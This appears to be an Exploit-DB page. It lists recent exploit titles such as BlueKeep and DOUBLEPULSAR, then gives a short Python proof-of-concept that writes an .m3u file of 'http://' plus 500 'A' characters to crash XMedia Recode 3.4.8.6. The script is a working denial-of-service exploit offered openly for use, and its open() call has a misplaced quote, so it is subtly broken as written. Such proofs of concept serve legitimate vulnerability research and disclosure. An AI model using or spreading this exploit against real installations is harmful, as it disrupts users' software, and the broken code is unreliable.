
13 changes to exploits/shellcodes ipPulse 1.92 - 'Enter Key' Denial of Service (PoC) Centova Cast 3.2.12 - Denial of Service (PoC) scadaApp for iOS 1.1.4.0 - 'Servername' Denial of Service (PoC) XMedia Recode 3.4.8.6 - '.m3u' Denial Of Service BartVPN 1.2.2 - 'BartVPNService' Unquoted Service Path Studio 5000 Logix Designer 30.01.00 - 'FactoryTalk Activation Service' Unquoted Service Path Microsoft Windows 10 Build 1803 < 1903 - 'COMahawk' Local Privilege Escalation DOUBLEPULSAR (x64) - Hooking 'srv!SrvTransactionNotImplemented' in 'srv!SrvTransaction2DispatchTable' Microsoft Windows 7 (x86) - 'BlueKeep' Remote Desktop Protocol (RDP) Remote Windows Kernel Use After Free Cisco Prime Infrastructure Health Monitor HA TarArchive - Directory Traversal / Remote Code Execution Apache Httpd mod_proxy - Error Page Cross-Site Scripting Apache Httpd mod_rewrite - Open Redirects WordPress Core < 5.2.3 - Viewing Unauthenticated/Password/Private Posts
30 lines
No EOL
740 B
Python
Executable file
30 lines
No EOL
740 B
Python
Executable file
#Exploit Title: XMedia Recode 3.4.8.6 - '.m3u' Denial Of Service
|
|
#Exploit Author : ZwX
|
|
#Exploit Date: 2019-11-18
|
|
#Vendor Homepage : https://www.xmedia-recode.de/
|
|
#Link Software : https://www.xmedia-recode.de/download.php
|
|
#Tested on OS: Windows 7
|
|
#Social: twitter.com/ZwX2a
|
|
#contact: msk4@live.fr
|
|
|
|
'''
|
|
Proof of Concept (PoC):
|
|
=======================
|
|
|
|
1.Download and install XMedia Recode
|
|
2.Run the python operating script that will create a file (poc.m3u)
|
|
3.Run the software "File -> Open File -> Add the file (.m3u) "
|
|
4.XMedia Recode Crashed
|
|
'''
|
|
|
|
#!/usr/bin/python
|
|
|
|
http = "http://"
|
|
buffer = "\x41" * 500
|
|
|
|
poc = http + buffer
|
|
file = open("poc.m3u,"w")
|
|
file.write(poc)
|
|
file.close()
|
|
|
|
print "POC Created by ZwX" |